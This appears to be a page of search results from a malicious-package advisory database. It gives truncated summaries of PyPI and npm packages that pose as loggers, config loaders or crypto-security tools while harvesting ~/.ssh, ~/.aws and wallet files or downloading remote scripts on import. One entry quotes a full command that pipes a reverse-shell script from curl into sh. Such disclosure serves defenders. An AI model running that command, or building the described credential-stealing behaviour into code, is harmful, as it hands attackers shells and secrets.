4574 matches found
Malicious code in pylogkt (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aa1c9e5bf0ffd994f076a4a76395b5bcccd2716229439910912bd49aaf52f903 The package masquerades as a logging utility but every call to its logging API log.info/debug/etc triggers Logger.log, which on macOS hosts paths...
MAL-2026-4291 Malicious code in pylogkt (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aa1c9e5bf0ffd994f076a4a76395b5bcccd2716229439910912bd49aaf52f903 The package masquerades as a logging utility but every call to its logging API log.info/debug/etc triggers Logger.log, which on macOS hosts paths...
Malicious code in env-loader-cli (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1749501a0825ad4a98638bbab4bd2bd9550436adcb9bb7781b6552735f7f3eb0 The package advertises itself as a benign.env/JSON/YAML loader but its top-level init.py imports a hidden core module that, on every import envloader...
MAL-2026-4272 Malicious code in env-loader-cli (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1749501a0825ad4a98638bbab4bd2bd9550436adcb9bb7781b6552735f7f3eb0 The package advertises itself as a benign.env/JSON/YAML loader but its top-level init.py imports a hidden core module that, on every import envloader...
Malicious code in data-pipeline-check (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 37ca0e77c4eda50057aa04c615897f067ee866d02fc1e2fe65cdbb263d3081e8 On import pipelinecheck, the package spawns a daemon thread that, after a random 3-15 second delay, walks /.ssh, /.aws, /.ethereum, /.config, /.docke...
MAL-2026-4273 Malicious code in git-config-sync (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401 On import gitconfigsync, the package's core.py spawns a daemon thread after a 3-15 second random delay that walks /.ssh, /.aws, /.ethereum, /.config,...
Malicious code in git-config-sync (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401 On import gitconfigsync, the package's core.py spawns a daemon thread after a 3-15 second random delay that walks /.ssh, /.aws, /.ethereum, /.config,...
Malicious code in solidity-build-guard (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector be62d73f7e4a6307ec5f0bac9b9543f9d73da696a4e67233057f77fd3cb6481c On import soliditybuildguard, the top-level init.py lines 11-24 shells out to curl to download a JavaScript file from a personal GitHub Pages URL...
MAL-2026-4262 Malicious code in solidity-build-guard (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector be62d73f7e4a6307ec5f0bac9b9543f9d73da696a4e67233057f77fd3cb6481c On import soliditybuildguard, the top-level init.py lines 11-24 shells out to curl to download a JavaScript file from a personal GitHub Pages URL...
Malicious code in defi-risk-scanner (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818 On first import defiriskscanner, the package's top-level init.py unconditionally runs curl -sL...
MAL-2026-4260 Malicious code in defi-risk-scanner (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818 On first import defiriskscanner, the package's top-level init.py unconditionally runs curl -sL...
MAL-2026-4261 Malicious code in eth-security-auditor (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1 On import, ethsecurityauditor/init.py unconditionally fetches a JavaScript payload from...
Malicious code in cryptowallet-safety (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d On import cryptowalletsafety, the top-level init.py lines 13-21 shells out to curl -sL...
Malicious code in peertube-plugin-google-analytics-js (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c66b6ebad55556f956fbc181293327eb4051d2ec6de6436a24d027fac58e580 This PeerTube plugin advertises itself as a Google Analytics integration but its client-side script client/common-client-plugin.js:8 registers a...
MAL-2026-4253 Malicious code in pylogft (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b35cabdffc8a44bcf857b973cc7eb89b6ae691c9be8189a58a0bd30c1a55a37 On import pylogft, the package's init.py lines 26-27 checks whether the install directory begins with /Users or /Library macOS developer/CI hosts and...
Malicious code in pylogft (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b35cabdffc8a44bcf857b973cc7eb89b6ae691c9be8189a58a0bd30c1a55a37 On import pylogft, the package's init.py lines 26-27 checks whether the install directory begins with /Users or /Library macOS developer/CI hosts and...
Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
MAL-2026-4227 Malicious code in lognest (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 481f45cde243009853b52b584fb6a1af2eae31e637912c8b78f18a8d7ee0d9d0 On import lognest, the package's init.py spawns a detached background subprocess running a sibling check.py lognest/init.py:25...
MAL-2026-4515 Malicious code in chai-val (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 515e313c5420dfe9edcb88d61079fa80dbf3539da465572fde5ece42ba6ed748 The package masquerades as a pino-logger helper file structure, exports, and keywords are copied from pino but its main entry exports a middleware th...
MAL-2026-4366 Malicious code in @autoheal/setup (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3a8b8b7d51e8865d048583893b08ad3d3d95a8371963b82adc6bf4b7938fe4c1 When the user runs this setup wizard, bin/setup.js posts the user's GitHub Personal Access Token scope repo,user:email, GitHub repo name, branch,...